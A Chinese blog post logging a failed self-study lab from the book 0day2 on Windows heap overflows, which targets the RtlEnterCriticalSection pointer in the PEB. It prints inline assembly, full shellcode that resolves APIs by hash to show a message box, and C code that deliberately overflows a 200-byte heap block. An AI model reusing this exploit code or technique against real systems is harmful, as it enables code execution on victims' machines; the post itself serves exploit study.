旧书重温:0day2【7】堆溢出实验
相关文章我拍成了照片,放在了我的QQ空间不是做广告(一张一张的传太麻烦了)http://user.qzone.qq.com/252738331/photo/V10U5YUk2v0ol6/ 密码9EY3TI
这个相册的图片是0day2中的第五章 有关堆溢出的利用文章
一直想把这节尽快做完实验,由于工作和生活琐事耽误了。这个实验是p171的狙击PEB中的RtlEnterCritical-Section()函数指针。(这个实验我没做成功!就是没有msg下,但是还是有经验收获的)
首先获取PEB中的RtlEnterCritical-Section()函数指针,据作者说在PEB偏移0x20处存着呢!
1 /* 获取rtlEnterCritical-Section`s address */ 2 _asm{ 3 xor eax,eax 4 mov eax,fs:[eax+0x30] //peb 5 lea eax,[eax+0x20] 6 7 int 3 8 9 10 }
我的函数地址和书上一样的0x7ffdf020,但是我创建的堆的地址和书上不一样我是0x360000的而书上是0x520000,注意
char shellcode[] = { "\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x20\xf0\xfd\7f\xbb\x4c\xaa\xf8\x77\x89\x18"\ "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\ "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\ "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\ "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\ "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\ "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\ "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\ "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\ "\xFC\x53\xFF\x57\xF8"\ "\x88\x06\x36\x00\x20\xf0\xfd\x7f"\ }; HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200); memcpy(h1,shellcode,0x200); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
调试过程中各种 报错,还没执行shellcode就 崩溃了。。。。
自己可以回去调试下
----------------------------------------------------
| QQ252738331
| Q群: 104132152(群名称是缓冲区溢出|汇编|逆向)
| 微博: http://t.qq.com/zhenw0
----------------------------------------------------
